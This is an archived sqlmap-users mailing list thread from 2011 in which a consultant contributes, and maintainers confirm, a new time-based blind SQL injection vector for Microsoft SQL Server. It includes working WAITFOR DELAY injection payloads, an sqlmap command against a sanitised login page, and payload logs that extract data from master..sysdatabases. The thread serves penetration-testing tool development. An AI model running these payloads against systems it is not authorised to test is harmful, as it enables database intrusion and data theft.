Thread: [sqlmap-users] New SQL Server blind test
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users
|
From: Steve P. <ste...@gm...> - 2011-01-17 23:43:12
Attachments:
smime.p7s
SQL_server-time_based.diff
|
Highly based on the "Microsoft SQL Server/Sybase stacked queries" test, which was throwing unrelated 500 errors on the ASP application I was testing due to the semicolons. This worked for data extraction for me. Not sure if one or the other of them should be moved to a higher level to limit testing time in the general case? Anyone have more experience with which one would be more useful? svn diff based on revision 3014. Patch licensed under GPLv2 to match the project license, if the patch is used. I assume that's the normal procedure for this project? -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
|
From: Miroslav S. <mir...@gm...> - 2011-01-18 00:02:59
|
Hi Steve. Thank you for your patch but I am not sure from SQL's perspective how this could work? So, basically, you are proposing time based sql injection payload (e.g.): IF(1=1) WAITFOR DELAY '0:0:1' and to be honest, I am not sure in which form, other than "stacked" this could fit in?? KR On Tue, Jan 18, 2011 at 12:42 AM, Steve Pinkham <ste...@gm...> wrote: > Highly based on the "Microsoft SQL Server/Sybase stacked queries" test, > which was throwing unrelated 500 errors on the ASP application I was > testing due to the semicolons. This worked for data extraction for me. > > Not sure if one or the other of them should be moved to a higher level > to limit testing time in the general case? Anyone have more experience > with which one would be more useful? > > svn diff based on revision 3014. > > Patch licensed under GPLv2 to match the project license, if the patch is > used. I assume that's the normal procedure for this project? > -- > | Steven Pinkham, Security Consultant | > | http://www.mavensecurity.com | > | GPG public key ID CD31CAFB | > > ------------------------------------------------------------------------------ > Protect Your Site and Customers from Malware Attacks > Learn about various malware tactics and how to avoid them. Understand > malware threats, the impact they can have on your business, and how you > can protect your company and customers by using code signing. > http://p.sf.net/sfu/oracle-sfdevnl > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-01-18 00:23:20
|
now i am really interested as hell :)) could you please just send one proper payload (use -v 3) which uses this vector? "i want to know" On Tue, Jan 18, 2011 at 1:02 AM, Miroslav Stampar <mir...@gm...> wrote: > Hi Steve. > > Thank you for your patch but I am not sure from SQL's perspective how > this could work? > > So, basically, you are proposing time based sql injection payload (e.g.): > > IF(1=1) WAITFOR DELAY '0:0:1' > > and to be honest, I am not sure in which form, other than "stacked" > this could fit in?? > > KR > > On Tue, Jan 18, 2011 at 12:42 AM, Steve Pinkham <ste...@gm...> wrote: >> Highly based on the "Microsoft SQL Server/Sybase stacked queries" test, >> which was throwing unrelated 500 errors on the ASP application I was >> testing due to the semicolons. This worked for data extraction for me. >> >> Not sure if one or the other of them should be moved to a higher level >> to limit testing time in the general case? Anyone have more experience >> with which one would be more useful? >> >> svn diff based on revision 3014. >> >> Patch licensed under GPLv2 to match the project license, if the patch is >> used. I assume that's the normal procedure for this project? >> -- >> | Steven Pinkham, Security Consultant | >> | http://www.mavensecurity.com | >> | GPG public key ID CD31CAFB | >> >> ------------------------------------------------------------------------------ >> Protect Your Site and Customers from Malware Attacks >> Learn about various malware tactics and how to avoid them. Understand >> malware threats, the impact they can have on your business, and how you >> can protect your company and customers by using code signing. >> http://p.sf.net/sfu/oracle-sfdevnl >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Steve P. <ste...@gm...> - 2011-01-18 00:48:25
Attachments:
smime.p7s
|
On 01/17/2011 07:02 PM, Miroslav Stampar wrote: > Hi Steve. > > Thank you for your patch but I am not sure from SQL's perspective how > this could work? > > So, basically, you are proposing time based sql injection payload (e.g.): > > IF(1=1) WAITFOR DELAY '0:0:1' > > and to be honest, I am not sure in which form, other than "stacked" > this could fit in?? > > KR > Donno, not a SQL guru, just know it works on SQL Server 2008 anyway ;-) Should work as an OR or AND statement, but then the present logical state of the query matters. Here's the output from my successful run using the patch, sanitised for public viewing: ./sqlmap.py -u https://BogusExample.com/Login******.asp --method=POST --data='id=asdf&pwd=asdf' -p id --time-sec=20 --dbms='Microsoft SQL Server' sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 05:54:02 [05:54:02] [INFO] using 'bogonExampleData' as session file [05:54:02] [INFO] testing connection to the target url [05:54:02] [WARNING] the testable parameter 'id' you provided is not into the Cookie [05:54:02] [INFO] testing if the url is stable, wait a few seconds [05:54:04] [INFO] url is stable [05:54:08] [WARNING] heuristic test shows that POST parameter 'id' might not be injectable [05:54:08] [INFO] testing sql injection on POST parameter 'id' [05:54:08] [INFO] testing 'AND boolean-based blind - WHERE clause' [05:54:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE clause' [05:54:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based' [05:55:02] [INFO] POST parameter 'id' is 'Microsoft SQL Server/Sybase time-based' injectable [05:55:02] [INFO] testing 'Generic NULL UNION query - 1 to 3 columns' POST parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 31 HTTP(s) requests: --- Place: POST Parameter: id Type: stacked queries Title: Microsoft SQL Server/Sybase time-based Payload: id=asdf' WAITFOR DELAY '0:0:20'-- AND 'uNsX'='uNsX&pwd=asdf --- [05:55:18] [INFO] testing Microsoft SQL Server [05:55:38] [INFO] confirming Microsoft SQL Server [05:56:40] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows Vista web application technology: ASP.NET, ASP, Microsoft IIS 7.0 back-end DBMS: Microsoft SQL Server 2008 [05:56:40] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 18 times [05:56:40] [INFO] Fetched data logged to text files under 'bogonExampleData' [*] shutting down at: 05:56:40 -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
|
From: Miroslav S. <mir...@gm...> - 2011-01-18 00:54:43
|
hi again. have you tried to use it? i am interested in data retrieval part :))))) (please use -v 3) kr On Tue, Jan 18, 2011 at 1:48 AM, Steve Pinkham <ste...@gm...> wrote: > On 01/17/2011 07:02 PM, Miroslav Stampar wrote: >> Hi Steve. >> >> Thank you for your patch but I am not sure from SQL's perspective how >> this could work? >> >> So, basically, you are proposing time based sql injection payload (e.g.): >> >> IF(1=1) WAITFOR DELAY '0:0:1' >> >> and to be honest, I am not sure in which form, other than "stacked" >> this could fit in?? >> >> KR >> > Donno, not a SQL guru, just know it works on SQL Server 2008 anyway ;-) > Should work as an OR or AND statement, but then the present logical > state of the query matters. > > > Here's the output from my successful run using the patch, sanitised for > public viewing: > ./sqlmap.py -u https://BogusExample.com/Login******.asp --method=POST > --data='id=asdf&pwd=asdf' -p id --time-sec=20 --dbms='Microsoft SQL Server' > > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 05:54:02 > > [05:54:02] [INFO] using 'bogonExampleData' as session file > [05:54:02] [INFO] testing connection to the target url > [05:54:02] [WARNING] the testable parameter 'id' you provided is not > into the Cookie > [05:54:02] [INFO] testing if the url is stable, wait a few seconds > [05:54:04] [INFO] url is stable > [05:54:08] [WARNING] heuristic test shows that POST parameter 'id' might > not be injectable > [05:54:08] [INFO] testing sql injection on POST parameter 'id' > [05:54:08] [INFO] testing 'AND boolean-based blind - WHERE clause' > [05:54:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - > WHERE clause' > [05:54:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based' > [05:55:02] [INFO] POST parameter 'id' is 'Microsoft SQL Server/Sybase > time-based' injectable > [05:55:02] [INFO] testing 'Generic NULL UNION query - 1 to 3 columns' > POST parameter 'id' is vulnerable. Do you want to keep testing the > others? [y/N] > sqlmap identified the following injection points with a total of 31 > HTTP(s) requests: > --- > Place: POST > Parameter: id > Type: stacked queries > Title: Microsoft SQL Server/Sybase time-based > Payload: id=asdf' WAITFOR DELAY '0:0:20'-- AND 'uNsX'='uNsX&pwd=asdf > --- > > [05:55:18] [INFO] testing Microsoft SQL Server > [05:55:38] [INFO] confirming Microsoft SQL Server > [05:56:40] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows Vista > web application technology: ASP.NET, ASP, Microsoft IIS 7.0 > back-end DBMS: Microsoft SQL Server 2008 > [05:56:40] [WARNING] HTTP error codes detected during testing: > 500 (Internal Server Error) - 18 times > [05:56:40] [INFO] Fetched data logged to text files under 'bogonExampleData' > [*] shutting down at: 05:56:40 > > > > -- > | Steven Pinkham, Security Consultant | > | http://www.mavensecurity.com | > | GPG public key ID CD31CAFB | > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Steve P. <ste...@gm...> - 2011-01-18 01:17:58
Attachments:
smime.p7s
|
On 01/17/2011 07:54 PM, Miroslav Stampar wrote: > hi again. > > have you tried to use it? i am interested in data retrieval part :))))) > > (please use -v 3) > > kr Can you be more specific as to what you would like to see? I have to redact the data for a few reasons, and the less I can send the better... -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
|
From: Steve P. <ste...@gm...> - 2011-01-18 01:20:18
Attachments:
smime.p7s
|
On 01/17/2011 07:54 PM, Miroslav Stampar wrote: > hi again. > > have you tried to use it? i am interested in data retrieval part :))))) > > (please use -v 3) > > kr > And yes, I have pulled data with it. That's where the time based data with a few errors came from before. -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
|
From: Miroslav S. <mir...@gm...> - 2011-01-18 01:25:20
|
ok, fair enough. please just send one of payloads used for data retrieval (something like this one): [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_ name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > 104), SLEEP(5), 9290) you'll see them with -v 3. you can censor table names. please, i just want to see something workable used for data retrieval (just spot those payloads with '>' inside) kr On Tue, Jan 18, 2011 at 2:20 AM, Steve Pinkham <ste...@gm...> wrote: > On 01/17/2011 07:54 PM, Miroslav Stampar wrote: >> hi again. >> >> have you tried to use it? i am interested in data retrieval part :))))) >> >> (please use -v 3) >> >> kr >> > And yes, I have pulled data with it. That's where the time based data > with a few errors came from before. > > > -- > | Steven Pinkham, Security Consultant | > | http://www.mavensecurity.com | > | GPG public key ID CD31CAFB | > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Steve P. <ste...@gm...> - 2011-01-18 01:34:02
Attachments:
smime.p7s
|
On 01/17/2011 06:48 PM, Bernardo Damele A. G. wrote:
> Steve,
>
>
> Are you saying that a query like:
>
> SELECT foo FROM table WHERE id=1 WAITFOR DELAY '0:0:10'
>
> is MSSQL-syntatically correct and works? If so, odd news :)
Yes, sometimes interesting discoveries come from not knowing any better,
and flinging poo at the app. ;-)
Unfortunately, I dont' have a MS test lab available, but I can confirm
that the injection works just fine on this SQL Server 2008 / ASP classic
application, and can't think of another reason why it would.
First I tested in burp, with post data:
id=asdf'IF('1'%3d'1')+WAITFOR+DELAY+'0:0:20&pwd=asdf
there is a 23 second delay with the app, and with
id=asdf'IF('1'%3d'2')+WAITFOR+DELAY+'0:0:20&pwd=asdf
there is a 3 second delay.
After adding the patch, sqlmap has so far extracted enough of the
version details and banner to be sure the patch works on this particular
app.
I wish I had a bunch of SQL server versions to test it on, but I don't
at the moment. Anyone else have a MSDN subscription or test lab already
built who can verify this is repeatable?
--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
|
|
From: Miroslav S. <mir...@gm...> - 2011-01-18 01:48:02
|
Steve.
i owe you an apology and congrats - it appears that you've found a new
injection vector.
it's looks like an SQL abomination, and I can't still believe, but it
appears that this really works:
SELECT * FROM users WHERE id=1 IF(1=1) WAITFOR DELAY '0:0:1'
i repeat, it looks like an SQL abomination but it works. i've just
tried with SSMS.
kr
p.s. i am still shocked :)
p.p.s. you are directly going into doc/THANKS :)
On Tue, Jan 18, 2011 at 2:33 AM, Steve Pinkham <ste...@gm...> wrote:
> On 01/17/2011 06:48 PM, Bernardo Damele A. G. wrote:
>> Steve,
>>
>>
>> Are you saying that a query like:
>>
>> SELECT foo FROM table WHERE id=1 WAITFOR DELAY '0:0:10'
>>
>> is MSSQL-syntatically correct and works? If so, odd news :)
>
> Yes, sometimes interesting discoveries come from not knowing any better,
> and flinging poo at the app. ;-)
>
> Unfortunately, I dont' have a MS test lab available, but I can confirm
> that the injection works just fine on this SQL Server 2008 / ASP classic
> application, and can't think of another reason why it would.
>
> First I tested in burp, with post data:
> id=asdf'IF('1'%3d'1')+WAITFOR+DELAY+'0:0:20&pwd=asdf
> there is a 23 second delay with the app, and with
> id=asdf'IF('1'%3d'2')+WAITFOR+DELAY+'0:0:20&pwd=asdf
> there is a 3 second delay.
>
> After adding the patch, sqlmap has so far extracted enough of the
> version details and banner to be sure the patch works on this particular
> app.
>
> I wish I had a bunch of SQL server versions to test it on, but I don't
> at the moment. Anyone else have a MSDN subscription or test lab already
> built who can verify this is repeatable?
>
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |
>
>
> ------------------------------------------------------------------------------
> Protect Your Site and Customers from Malware Attacks
> Learn about various malware tactics and how to avoid them. Understand
> malware threats, the impact they can have on your business, and how you
> can protect your company and customers by using code signing.
> http://p.sf.net/sfu/oracle-sfdevnl
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
|
From: Steve P. <ste...@gm...> - 2011-01-18 02:11:54
Attachments:
smime.p7s
|
On 01/17/2011 08:47 PM, Miroslav Stampar wrote: > Steve. > > i owe you an apology and congrats - it appears that you've found a new > injection vector. > > it's looks like an SQL abomination, and I can't still believe, but it > appears that this really works: > > SELECT * FROM users WHERE id=1 IF(1=1) WAITFOR DELAY '0:0:1' > > i repeat, it looks like an SQL abomination but it works. i've just > tried with SSMS. > > kr > > p.s. i am still shocked :) > p.p.s. you are directly going into doc/THANKS :) > You're welcome. If sqlmap wasn't so easy to add new vectors to, I probably never would have shared that this works, just for not knowing no one else knew it works ;-) Thanks for an excellent product. (both of you, and all the other contributors over the years) -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
|
From: Steve P. <ste...@gm...> - 2011-01-18 01:59:22
Attachments:
smime.p7s
|
On 01/17/2011 08:25 PM, Miroslav Stampar wrote: > ok, fair enough. > > please just send one of payloads used for data retrieval (something > like this one): > > [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_ > name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > > 104), SLEEP(5), 9290) > > you'll see them with -v 3. you can censor table names. please, i just > want to see something workable used for data retrieval (just spot > those payloads with '>' inside) > > kr Since you seem anxious, I'll send the warm up.. Hasn't hit the good part yet. ;-) [09:41:40] [INFO] fetching database names [09:41:40] [INFO] fetching number of databases [09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:41:40] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. [09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:43:37] [INFO] retrieved: 24 [09:43:37] [DEBUG] performed 10 queries in 117 seconds -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
|
From: Miroslav S. <mir...@gm...> - 2011-01-18 02:05:55
|
well, i've apologized already. i've realized 15 minutes ago that this really is a new sql injection vector. you can find yourself in the latest revision commit of doc/THANKS file. kr On Tue, Jan 18, 2011 at 2:59 AM, Steve Pinkham <ste...@gm...> wrote: > On 01/17/2011 08:25 PM, Miroslav Stampar wrote: >> ok, fair enough. >> >> please just send one of payloads used for data retrieval (something >> like this one): >> >> [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_ >> name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > >> 104), SLEEP(5), 9290) >> >> you'll see them with -v 3. you can censor table names. please, i just >> want to see something workable used for data retrieval (just spot >> those payloads with '>' inside) >> >> kr > > Since you seem anxious, I'll send the warm up.. Hasn't hit the good part > yet. ;-) > > [09:41:40] [INFO] fetching database names > [09:41:40] [INFO] fetching number of databases > [09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:41:40] [WARNING] time-based comparison needs larger statistical > model. Making a few dummy requests, please wait.. > [09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi > [09:43:37] [INFO] retrieved: 24 > [09:43:37] [DEBUG] performed 10 queries in 117 seconds > > > > -- > | Steven Pinkham, Security Consultant | > | http://www.mavensecurity.com | > | GPG public key ID CD31CAFB | > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-01-18 02:08:52
|
"Since you seem anxious, I'll send the warm up." - you've thought that i was kidding :) it was really a sincere mail and this is the core part: "it's looks like an SQL abomination, and I can't still believe, but it appears that this really works" On Tue, Jan 18, 2011 at 3:05 AM, Miroslav Stampar <mir...@gm...> wrote: > well, i've apologized already. i've realized 15 minutes ago that this > really is a new sql injection vector. > > you can find yourself in the latest revision commit of doc/THANKS file. > > kr > > On Tue, Jan 18, 2011 at 2:59 AM, Steve Pinkham <ste...@gm...> wrote: >> On 01/17/2011 08:25 PM, Miroslav Stampar wrote: >>> ok, fair enough. >>> >>> please just send one of payloads used for data retrieval (something >>> like this one): >>> >>> [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_ >>> name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > >>> 104), SLEEP(5), 9290) >>> >>> you'll see them with -v 3. you can censor table names. please, i just >>> want to see something workable used for data retrieval (just spot >>> those payloads with '>' inside) >>> >>> kr >> >> Since you seem anxious, I'll send the warm up.. Hasn't hit the good part >> yet. ;-) >> >> [09:41:40] [INFO] fetching database names >> [09:41:40] [INFO] fetching number of databases >> [09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:41:40] [WARNING] time-based comparison needs larger statistical >> model. Making a few dummy requests, please wait.. >> [09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi >> [09:43:37] [INFO] retrieved: 24 >> [09:43:37] [DEBUG] performed 10 queries in 117 seconds >> >> >> >> -- >> | Steven Pinkham, Security Consultant | >> | http://www.mavensecurity.com | >> | GPG public key ID CD31CAFB | >> >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Steve P. <ste...@gm...> - 2011-01-18 02:17:08
Attachments:
smime.p7s
|
On 01/17/2011 09:08 PM, Miroslav Stampar wrote: > "Since you seem anxious, I'll send the warm up." - you've thought that > i was kidding :) > > it was really a sincere mail and this is the core part: > "it's looks like an SQL abomination, and I can't still believe, but it > appears that this really works" Nah, just hadn't read that email yet, was talking about your excitement from before.. No worries mate. -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
×
Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.
Thanks for helping keep SourceForge clean.
X